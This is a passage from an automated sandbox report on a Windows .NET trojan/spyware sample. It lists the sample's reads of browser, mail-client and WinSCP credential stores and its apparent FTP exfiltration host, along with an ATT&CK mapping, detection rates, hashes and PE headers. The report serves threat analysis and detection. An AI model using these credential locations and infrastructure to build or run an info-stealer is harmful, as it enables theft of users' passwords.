          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Users\user\Desktop\Q4YODvoYjL.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeCode function: 1_2_00D7F610 GetUserNameW,1_2_00D7F610

Stealing of Sensitive Information

Source: Yara match | File source: 00000001.00000002.563968449.0000000002A3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Q4YODvoYjL.exe PID: 352, type: MEMORYSTR
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: Yara match | File source: 00000001.00000002.563968449.0000000002A3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Q4YODvoYjL.exe PID: 352, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: 00000001.00000002.563968449.0000000002A3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Q4YODvoYjL.exe PID: 352, type: MEMORYSTR
MITRE ATT&CK Matrix (digits before a technique name are the report's signature-count badges for that technique):

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | 211 Windows Management Instrumentation | Path Interception | 111 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 111 Security Software Discovery | Remote Services | 1 Email Collection | 1 Exfiltration Over Alternative Protocol | 11 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Disable or Modify Tools | 1 Credentials in Registry | 131 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Archive Collected Data | Exfiltration Over Bluetooth | 1 Non-Standard Port | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 131 Virtualization/Sandbox Evasion | Security Account Manager | 1 Application Window Discovery | SMB/Windows Admin Shares | 1 Data from Local System | Automated Exfiltration | 1 Ingress Tool Transfer | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 111 Process Injection | NTDS | 1 Account Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 2 Non-Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 2 Obfuscated Files or Information | LSA Secrets | 1 System Owner/User Discovery | SSH | Keylogging | Data Transfer Size Limits | 23 Application Layer Protocol | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 2 Software Packing | Cached Domain Credentials | 1 Remote System Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 114 System Information Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |
Antivirus, Machine Learning and Genetic Malware Detection

Source | Detection | Scanner | Label
Q4YODvoYjL.exe | 31% | ReversingLabs | Win32.Trojan.Generic
Q4YODvoYjL.exe | 38% | Virustotal |
Q4YODvoYjL.exe | 100% | Joe Sandbox ML |

No Antivirus matches

Source | Detection | Scanner | Label
1.2.Q4YODvoYjL.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1203035

Source | Detection | Scanner | Label
ftp.valvulasthermovalve.cl | 13% | Virustotal |

Source | Detection | Scanner | Label
http://ftp.valvulasthermovalve.cl | 100% | URL Reputation | phishing
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
Domains and IPs

Name | IP | Active | Malicious | Antivirus Detection | Reputation
api4.ipify.org | 173.231.16.76 | true | false | | high
ftp.valvulasthermovalve.cl | 190.107.177.239 | true | true | | unknown
api.ipify.org | unknown | unknown | false | | high

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | false | | high

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designersG | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ftp.valvulasthermovalve.cl | Q4YODvoYjL.exe, 00000001.00000002.563968449.0000000002A6C000.00000004.00000800.00020000.00000000.sdmp; Q4YODvoYjL.exe, 00000001.00000002.563968449.0000000002A3C000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: phishing | unknown
http://www.fontbureau.com/designers/? | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.tiro.com | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.goodfont.co.kr | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
https://api.ipify.org | Q4YODvoYjL.exe, 00000001.00000002.563968449.00000000029F1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://fontfabrik.com | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.jiyu-kobo.co.jp/ | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fonts.com | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sandoll.co.kr | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false
                                      • URL Reputation: safe
                                      unknown
                                      http://www.urwpp.deDPleaseQ4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.zhongyicts.com.cnQ4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameQ4YODvoYjL.exe, 00000001.00000002.563968449.00000000029F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.sakkal.comQ4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
IP               Domain                      Country        ASN     ASN Name                        Malicious
190.107.177.239  ftp.valvulasthermovalve.cl  Chile          265831  SOCCOMERCIALWIRENETCHILELTDACL  true
173.231.16.76    api4.ipify.org              United States  18450   WEBNXUS                         false
Joe Sandbox Version: 37.0.0 Beryl
Analysis ID: 830848
Start date and time: 2023-03-20 18:31:07 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 41s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: Q4YODvoYjL.exe
Original Sample Name: e30c67b19383f259d7414b763049eb2f.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/1@3/2
EGA Information:
• Successful, ratio: 100%
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 27
• Number of non-executed functions: 5
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
• Not all processes were analyzed; the report is missing behavior information.
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time      Type             Description
18:32:16  API Interceptor  1x Sleep call for process: Q4YODvoYjL.exe modified
Process: C:\Users\user\Desktop\Q4YODvoYjL.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.355304211458859
Encrypted: false
SSDEEP: 24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5: FED34146BF2F2FA59DCF8702FCC8232E
SHA1: B03BFEA175989D989850CF06FE5E7BBF56EAA00A
SHA-256: 123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512: 1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
Malicious: true
Reputation: high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.8590585184951305
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: Q4YODvoYjL.exe
File size: 743936
MD5: e30c67b19383f259d7414b763049eb2f
SHA1: 8a1465b73066cf8642d39c9ef2333d8361e9d177
SHA256: 182086eeecf6f1b4dc82a040a476d947759556513ad63c129604c565cd06cdc3
SHA512: 259d0ab342f9bbc514d57064203ef45f07f2236b50fae92c29842371350627ada09a745a48fefc0ec8f85f524dad7f0252ef807714d09991cffb633cb61578f7
SSDEEP: 12288:C4hmYMUnFW/NxBig0kCw7B89OFsFVLWJDGeVjhiPJ8MoN5oxbjS2RyXyabHWHRpe:C4hUDQNkCQoOFYVADxkBzO2xbjJyiSWE
TLSH: 8FF402742BEA9739F43297BE85A43545976E63B32717C84C04F211CE4BA3B435ED0A2B
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... ..d..............0..D...........b... ........@.. ....................................@................................
Icon Hash: 209480e66eb84902
Entrypoint: 0x4b62fe
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x6417B720 [Mon Mar 20 01:30:08 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]    ; .NET native entry stub: indirect jump through the import address table (mscoree!_CorExeMain)
add byte ptr [eax], al       ; repeated 22 times: zero bytes (00 00) following the stub, not real code
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb62ab | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb8000 | 0x1110 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xba000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb4e98 | 0x54 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xb4304 | 0xb4400 | False | 0.9267144699202496 | data | 7.867913508227014 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xb8000 | 0x1110 | 0x1200 | False | 0.73046875 | data | 6.632660853110352 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
